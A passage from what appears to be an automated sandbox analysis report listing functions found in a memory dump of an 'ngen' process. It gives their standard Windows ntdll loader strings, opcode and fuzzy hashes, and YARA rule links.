                                                                                                                      • Instruction ID: 8b555898f51badb00257221c9c3d94dcc0c3450994973cd0570aef1e6aa9a0ab
                                                                                                                      • Opcode Fuzzy Hash: 167e6574566378636928be43c52898f15ba972f09d4e4945f129f8bf27629547
                                                                                                                      • Instruction Fuzzy Hash: EF5133707057809BEB25CF18C998F2A77E9FF00724F590964ED929B6D1CBB4E804EB50
                                                                                                                      Function 0576C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 057A82DE
                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 057A82D7
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 057A82E8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-1783798831
                                                                                                                      • Opcode ID: ec8d8729226216b051ecf93b4af7bacfeab94bf4e42f0832c9e4d68a627d3891
                                                                                                                      • Instruction ID: e8c90618bd26097121fbfb669cf4fa416d4e102276294a6f393e84db8dfb9ad3
                                                                                                                      • Opcode Fuzzy Hash: ec8d8729226216b051ecf93b4af7bacfeab94bf4e42f0832c9e4d68a627d3891
                                                                                                                      • Instruction Fuzzy Hash: 3241D372654300EBC721EB24D849F6B7BE9FB44750F00892AFD85D7290EB70E800AB92
                                                                                                                      Function 0572758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                      • API String ID: 0-1151232445
                                                                                                                      • Opcode ID: 97f7af79ed62e32455f3e09e4d87c91efd1844b018529c6dbd6a50156ad6c71e
                                                                                                                      • Instruction ID: 030a537e66064062d6d016098650bb46d284d1e650e460f5998cf5305adb5f11
                                                                                                                      • Opcode Fuzzy Hash: 97f7af79ed62e32455f3e09e4d87c91efd1844b018529c6dbd6a50156ad6c71e
                                                                                                                      • Instruction Fuzzy Hash: 2F4126F03442908FDF39EF5CC184B7A77E2EF01314F18846AD4868B256DAB4D885EB51
                                                                                                                      Function 057616CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 057A1B4A
                                                                                                                      • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 057A1B39
                                                                                                                      • LdrpAllocateTls, xrefs: 057A1B40
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                      • API String ID: 0-4274184382
                                                                                                                      • Opcode ID: 9d7dacd0f52b7eef74f4ea1cb5f68bdcfcb490bbd9621c1ccf1ae1a2ab2fd282
                                                                                                                      • Instruction ID: f924c068f3dd37652994409566afbab8b7f60d0e71919905b18f065d4417faed
                                                                                                                      • Opcode Fuzzy Hash: 9d7dacd0f52b7eef74f4ea1cb5f68bdcfcb490bbd9621c1ccf1ae1a2ab2fd282
                                                                                                                      • Instruction Fuzzy Hash: FF41AFB6A00604EFDB15DFA8D849BADBBF5FF48714F548519E806A7250DB74A800EF90
                                                                                                                      Function 057EC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • PreferredUILanguages, xrefs: 057EC212
                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 057EC1C5
                                                                                                                      • @, xrefs: 057EC1F1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                      • API String ID: 0-2968386058
                                                                                                                      • Opcode ID: c9411143e28a9ace3a489244fe6f210e3e7efe6b5ae5d3d5998b430b0941ce89
                                                                                                                      • Instruction ID: d3af1da595e1dff1546423d9efc0d6b9f005124e3704253c7bdb90e5931eb10c
                                                                                                                      • Opcode Fuzzy Hash: c9411143e28a9ace3a489244fe6f210e3e7efe6b5ae5d3d5998b430b0941ce89
                                                                                                                      • Instruction Fuzzy Hash: 1D416F76A00319EBDF12DBD4C889FEEB7BDBB08704F14406AE905B7280D7749E44AB54
                                                                                                                      Function 057B4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • LdrpCheckRedirection, xrefs: 057B488F
                                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 057B4888
                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 057B4899
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                      • API String ID: 0-3154609507
                                                                                                                      • Opcode ID: e0af23bc4af1b98de2cc2303c0be3a5604282a4e9e6325a627878910806e3e87
                                                                                                                      • Instruction ID: 903265f69483c6edfd319b0ce3c45982d3f9d80b1fa34635fbcfaed84aa94d59
                                                                                                                      • Opcode Fuzzy Hash: e0af23bc4af1b98de2cc2303c0be3a5604282a4e9e6325a627878910806e3e87
                                                                                                                      • Instruction Fuzzy Hash: DE41D072A042509FEF21CE18D844BA6BBE7FF49750F050669FC4997252D7B0E800EB91
                                                                                                                      Function 057C4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                      • API String ID: 0-1373925480
                                                                                                                      • Opcode ID: 1390d21317fff727edc5b5fc256fef47c4b3991c17d014d8a5785dff30efa3de
                                                                                                                      • Instruction ID: 1a8ef7418169cd92271a83c21f63ee1a9d92cfd28cffe9451f8e7d29e26ebbaf
                                                                                                                      • Opcode Fuzzy Hash: 1390d21317fff727edc5b5fc256fef47c4b3991c17d014d8a5785dff30efa3de
                                                                                                                      • Instruction Fuzzy Hash: E041F372A042588BEF26DBA4CC58FADBBBAFF55340F14049DD842EB781D7748901EB10
                                                                                                                      Function 057BB594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 057BB632
                                                                                                                      • GlobalFlag, xrefs: 057BB68F
                                                                                                                      • @, xrefs: 057BB670
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                      • API String ID: 0-4192008846
                                                                                                                      • Opcode ID: 1ab9bb00065eeb096a7c580dddb0fb252bb320f1f2591ae4a961832012cbaaa0
                                                                                                                      • Instruction ID: e2a3451e7f6b8add8eeee8f45343bd1bec287787eccbdf7819e503cd23f2e588
                                                                                                                      • Opcode Fuzzy Hash: 1ab9bb00065eeb096a7c580dddb0fb252bb320f1f2591ae4a961832012cbaaa0
                                                                                                                      • Instruction Fuzzy Hash: B63152B1A0021DAFEB10EFA4DC84FEEBB78EF44744F140469E905A7150E7B49E00EB94
                                                                                                                      Function 05761607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 057A1A51
                                                                                                                      • DLL "%wZ" has TLS information at %p, xrefs: 057A1A40
                                                                                                                      • LdrpInitializeTls, xrefs: 057A1A47
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                      • API String ID: 0-931879808
                                                                                                                      • Opcode ID: 9996657568acdc4adfe2e2a44fc8393d8dc06247e691562eb3fc973e552cf3aa
                                                                                                                      • Instruction ID: e5f14421ae4377b21a87adfacfed42c3a1f30e63f53dda6de55c134a64a29999
                                                                                                                      • Opcode Fuzzy Hash: 9996657568acdc4adfe2e2a44fc8393d8dc06247e691562eb3fc973e552cf3aa
                                                                                                                      • Instruction Fuzzy Hash: 8831C772A50210ABE7209F58C94EF7A7A79FB40754F454529FD09BB180EF70BD44E790
                                                                                                                      Function 057B20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • LdrpInitializationFailure, xrefs: 057B20FA
                                                                                                                      • Process initialization failed with status 0x%08lx, xrefs: 057B20F3
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 057B2104
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-2986994758
                                                                                                                      • Opcode ID: ddd4c11cb32afc8ec258ae59dace0450b6c7a4c6d6198dd958384fbeac11755d
                                                                                                                      • Instruction ID: e436d17f89775c71c6c465e48ceca0cd97c71661e1f2f445741c1e1e808f7c59
                                                                                                                      • Opcode Fuzzy Hash: ddd4c11cb32afc8ec258ae59dace0450b6c7a4c6d6198dd958384fbeac11755d
                                                                                                                      • Instruction Fuzzy Hash: 81F0287576020CAFEB20E60CDC5BFD93BA8EB40B04F100424FE016B282DAF0A500E640
                                                                                                                      Function 057FA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-197956300
                                                                                                                      • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                      • Instruction ID: fd99ae79b3ed2fde8ddcd4c9eb78cd80a945f59f5d13763b0051087e6a851873
                                                                                                                      • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                      • Instruction Fuzzy Hash: F3C1C1312083469FDB24CF29C845B6BBBE6BF84318F044A2DF69ACA390D774D505EB52
                                                                                                                      Function 057AE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: Legacy$UEFI
                                                                                                                      • API String ID: 2994545307-634100481
                                                                                                                      • Opcode ID: a2d90651dca3906dfee3dea6094f358cba22ac434fbf57d5bb43931169b391b8
                                                                                                                      • Instruction ID: 2e8c7401e5887619824923f8a212baf0ed912010a64f2f6728dac31cd6073852
                                                                                                                      • Opcode Fuzzy Hash: a2d90651dca3906dfee3dea6094f358cba22ac434fbf57d5bb43931169b391b8
                                                                                                                      • Instruction Fuzzy Hash: 95616D72E043189FDB15DFA8C884BAEBBB9FB84700F50416DE959EB291D731E940EB50
                                                                                                                      Function 0574F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$$
                                                                                                                      • API String ID: 0-233714265
                                                                                                                      • Opcode ID: 5a17fb56f0671d8f79d1b82dd199ad66b1c29d7a80531c4f5eaf6818513a23ec
                                                                                                                      • Instruction ID: d8d50571be325a59f63ecce25581fe1676fb35d7278d8fe3c003fc2a35942088
                                                                                                                      • Opcode Fuzzy Hash: 5a17fb56f0671d8f79d1b82dd199ad66b1c29d7a80531c4f5eaf6818513a23ec
                                                                                                                      • Instruction Fuzzy Hash: B461DD71A04749DFDB20EFA4C588BADBBB6FF44304F144429D915AB780DB74A981EF90
                                                                                                                      Function 057304E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • kLsE, xrefs: 05730540
                                                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0573063D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                      • API String ID: 0-2547482624
                                                                                                                      • Opcode ID: 15e67532361ce3fd2f4e56664e8c8666141908031f3715cde82400a2faf15a29
                                                                                                                      • Instruction ID: 8dd507799125daf76340081e1cf5fd922a4c4db34138e4d2b87e1f0b52d82da1
                                                                                                                      • Opcode Fuzzy Hash: 15e67532361ce3fd2f4e56664e8c8666141908031f3715cde82400a2faf15a29
                                                                                                                      • Instruction Fuzzy Hash: C951B271604742CFC724DF66C54AAA7B7E5BF84324F00883EE9EA87242E770D545DB92
                                                                                                                      Function 057C35BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                      • API String ID: 0-118005554
                                                                                                                      • Opcode ID: 670ddd90fbd7fe3b3b6ce94ad4f73060c45305742afd0497f3d3ff0003cec854
                                                                                                                      • Instruction ID: fd54d99203d6255e25dd71a253991feab5af0228edad5b363add6e07e0d128f0
                                                                                                                      • Opcode Fuzzy Hash: 670ddd90fbd7fe3b3b6ce94ad4f73060c45305742afd0497f3d3ff0003cec854
                                                                                                                      • Instruction Fuzzy Hash: FF319A312087819BD311DF68D848B2ABBE4FF85714F044CADF8559B391EB70D905EB92
                                                                                                                      Function 057634B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • RtlpInitializeAssemblyStorageMap, xrefs: 057A2A90
                                                                                                                      • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 057A2A95
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                      • API String ID: 0-2653619699
                                                                                                                      • Opcode ID: 2f3aa636e14c8f46c142697807ff7ac7b130fa8e2aec990ede38e094f2c08e2a
                                                                                                                      • Instruction ID: 0ade511c5eefef93172b918d5e8c176241e65e82820dd1ad1fc331da2e0e4cad
                                                                                                                      • Opcode Fuzzy Hash: 2f3aa636e14c8f46c142697807ff7ac7b130fa8e2aec990ede38e094f2c08e2a
                                                                                                                      • Instruction Fuzzy Hash: 3F11E976B04214ABEB25CA4C8D45F7FB6AAEBD4B54F188069BD05EB244D674CD00F6A0
                                                                                                                      Function 0576A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: Cleanup Group$Threadpool!
                                                                                                                      • API String ID: 2994545307-4008356553
                                                                                                                      • Opcode ID: 89591069932ee8ac0c2dc3485d85641ecff29725b8207aa8397b40a3eaf1bc12
                                                                                                                      • Instruction ID: 549f8b0e8e7eb7a931cd505c480fdd734e47b43474a715b0c6092c9d5003f7e8
                                                                                                                      • Opcode Fuzzy Hash: 89591069932ee8ac0c2dc3485d85641ecff29725b8207aa8397b40a3eaf1bc12
                                                                                                                      • Instruction Fuzzy Hash: 3801DCB2264744EFD321DF24CD4AB267BE8EB44B15F01C939B958D7190EB34E808EB46
                                                                                                                      Function 0573C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: MUI
                                                                                                                      • API String ID: 0-1339004836
                                                                                                                      • Opcode ID: 95a4051f742410a80ac5453d67329b671fd204a2ad2d66bf9b377a71a511695e
                                                                                                                      • Instruction ID: 238a2dc20c805ff840e3b4704427140b96bb52d7737334067e720f529f8afa10
                                                                                                                      • Opcode Fuzzy Hash: 95a4051f742410a80ac5453d67329b671fd204a2ad2d66bf9b377a71a511695e
                                                                                                                      • Instruction Fuzzy Hash: C1828C75E042188FDB25CFA8C885BEDB7B6BF48360F148169E85ABB352D7309D41EB40
                                                                                                                      Function 05737370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cbc29842c778f8907bd75e225059213919415f5f2bae1379e77c5b26d0f294ca
                                                                                                                      • Instruction ID: 46845db9750a1c6e4a06731f77ab35f079c3cebc08fb758af819791ef8e05d3b
                                                                                                                      • Opcode Fuzzy Hash: cbc29842c778f8907bd75e225059213919415f5f2bae1379e77c5b26d0f294ca
                                                                                                                      • Instruction Fuzzy Hash: 90A17CB1608342CFC728DF29D485A2ABBE6FF88324F10496DE58587351E730EA45DF92
                                                                                                                      Function 0576F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 29b29e5f210975b2ce44919968f15b1b214ce29c2c21d96132a6e849f332d249
                                                                                                                      • Instruction ID: a80479ef57341b94fdc0f2e72efcd94aebc154f4061b62167d2c8df4b3a771b1
                                                                                                                      • Opcode Fuzzy Hash: 29b29e5f210975b2ce44919968f15b1b214ce29c2c21d96132a6e849f332d249
                                                                                                                      • Instruction Fuzzy Hash: 0D414D74D00288EFDB20CFA9D481AADBFF4FB48700F50856EE959A7615DB31A944DF60
                                                                                                                      Function 0576A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: GlobalTags
                                                                                                                      • API String ID: 0-1106856819
                                                                                                                      • Opcode ID: 4d7ca2d8f0a64d7ce05c9654050f4407f72553f7b1d2307a0e8418a27e870623
                                                                                                                      • Instruction ID: 39d1836387c8eb7fb72f59d626a511c1d671a31d38475196ccc13f0a842042de
                                                                                                                      • Opcode Fuzzy Hash: 4d7ca2d8f0a64d7ce05c9654050f4407f72553f7b1d2307a0e8418a27e870623
                                                                                                                      • Instruction Fuzzy Hash: 62719776E04219DFDF19CF58D594AEDB7B2FF88710F18822DE806A7240D7719941DB50
                                                                                                                      Function 0573973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 0-2766056989
                                                                                                                      • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                                      • Instruction ID: 8a56002ec129d4c8d396b4ef8179f7083c6152abff6060022da3b56cebc3411c
                                                                                                                      • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                                      • Instruction Fuzzy Hash: 1C618D75D04219AFDF21DFA9D849BEEBBB5FF80724F100529E911B7291D7709A00EB60
                                                                                                                      Function 057BF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 0-2766056989
                                                                                                                      • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                                      • Instruction ID: 699186814bdf8beb7cedfdad723f40febf631080d988114a29c11585a422eb25
                                                                                                                      • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                                      • Instruction Fuzzy Hash: FC517B72608705AFE7219F54CC48FAAB7E8FB84B54F000929F994D7290E7B4ED44EB91
                                                                                                                      Function 0574E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: EXT-
                                                                                                                      • API String ID: 0-1948896318
                                                                                                                      • Opcode ID: e780caca8a7b0797f42503dd3a0dda2597fe185787fefecaebb6f2a7914ca20c
                                                                                                                      • Instruction ID: 18af66da2c89d36684e81cc4131769b5a2965698879f69a0055bfb4242eca488
                                                                                                                      • Opcode Fuzzy Hash: e780caca8a7b0797f42503dd3a0dda2597fe185787fefecaebb6f2a7914ca20c
                                                                                                                      • Instruction Fuzzy Hash: 08416C72608311AFD721DB758888B6BB7ECBF88724F440929F985D7180E774D904EB97
                                                                                                                      Function 057AC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: BinaryHash
                                                                                                                      • API String ID: 0-2202222882
                                                                                                                      • Opcode ID: ecfd7f723d595cafaebfdacbe8a6a97f73ebd862efb869a478e5901066890a57
                                                                                                                      • Instruction ID: a3cd7df8d0878573459f76c2de0c1bc5f48ca6b6167a55e0937263e2cff21630
                                                                                                                      • Opcode Fuzzy Hash: ecfd7f723d595cafaebfdacbe8a6a97f73ebd862efb869a478e5901066890a57
                                                                                                                      • Instruction Fuzzy Hash: 294144B2D0112DAADF22DB50DC88FDEB77CAB44714F0045A5BA18AB140DB709E89DF94
                                                                                                                      Function 057B97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
